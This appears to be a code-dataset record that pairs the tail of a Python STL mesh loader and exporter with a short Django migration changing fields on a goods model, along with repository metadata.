text = text.decode('utf-8')
text = text.lower().split('endsolid')[0]
blob = np.array(text.split())
# there are 21 'words' in each face
face_len = 21
face_count = len(blob) / face_len
if (len(blob) % face_len) != 0:
raise HeaderError('Incorrect number of values in STL file!')
face_count = int(face_count)
# this offset is to be added to a fixed set of indices that is tiled
offset = face_len * np.arange(face_count).reshape((-1, 1))
normal_index = np.tile([2, 3, 4], (face_count, 1)) + offset
vertex_index = np.tile(
[8, 9, 10, 12, 13, 14, 16, 17, 18], (face_count, 1)) + offset
# faces are groups of three sequential vertices, as vertices are not
# references
faces = np.arange(face_count * 3).reshape((-1, 3))
face_normals = blob[normal_index].astype(np.float64)
vertices = blob[vertex_index.reshape((-1, 3))].astype(np.float64)
return {'vertices': vertices,
'faces': faces,
'face_normals': face_normals}
def export_stl(mesh):
'''
Convert a Trimesh object into a binary STL file.
Arguments
---------
mesh: Trimesh object
Returns
---------
export: bytes, representing mesh in binary STL form
'''
header = np.zeros(1, dtype=_stl_dtype_header)
header['face_count'] = len(mesh.faces)
packed = np.zeros(len(mesh.faces), dtype=_stl_dtype)
packed['normals'] = mesh.face_normals
packed['vertices'] = mesh.triangles
export = header.tostring()
export += packed.tostring()
return export
def export_stl_ascii(mesh):
'''
Convert a Trimesh object into an ASCII STL file.
Arguments
---------
mesh: Trimesh object
Returns
---------
export: str, mesh represented as an ASCII STL file
'''
# move all the data thats going into the STL file into one array
blob = np.zeros((len(mesh.faces), 4, 3))
blob[:, 0, :] = mesh.face_normals
blob[:, 1:, :] = mesh.triangles
# create a lengthy format string for the data section of the file
format_string = 'facet normal {} {} {}\nouter loop\n'
format_string += 'vertex {} {} {}\n' * 3
format_string += 'endloop\nendfacet\n'
format_string *= len(mesh.faces)
# concatenate the header, data, and footer
export = 'solid \n'
export += format_string.format(*blob.reshape(-1))
export += 'endsolid'
return export
_stl_loaders = {'stl': load_stl,
'stl_ascii': load_stl}
|
[
"mik3dh@gmail.com"
] |
mik3dh@gmail.com
|
480d9a66e2a6c4e56d92084f3b27f5626c89d12a
|
f9b5c37a098ed940d943415aadda130c13271754
|
/dailyfresh/f_goods/migrations/0003_auto_20180619_2120.py
|
47da203ab64800d2950a865ce0879526e9bf7ef2
|
[] |
no_license
|
duanHongPy/django
|
cd00fe819576741a7c1860ea420275129d759d67
|
3fee019b3d8d50218410366d62eac29700f9e69a
|
refs/heads/master
| 2020-03-19T23:28:01.420061
| 2018-06-21T02:53:19
| 2018-06-21T02:53:19
| 137,007,195
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 558
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.13 on 2018-06-19 13:20
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('f_goods', '0002_auto_20180619_1910'),
]
operations = [
migrations.RemoveField(
model_name='goodinfo',
name='gsales',
),
migrations.AlterField(
model_name='goodinfo',
name='gclick',
field=models.IntegerField(default=0),
),
]
|
[
"xwp_fullstack@163.com"
] |
xwp_fullstack@163.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.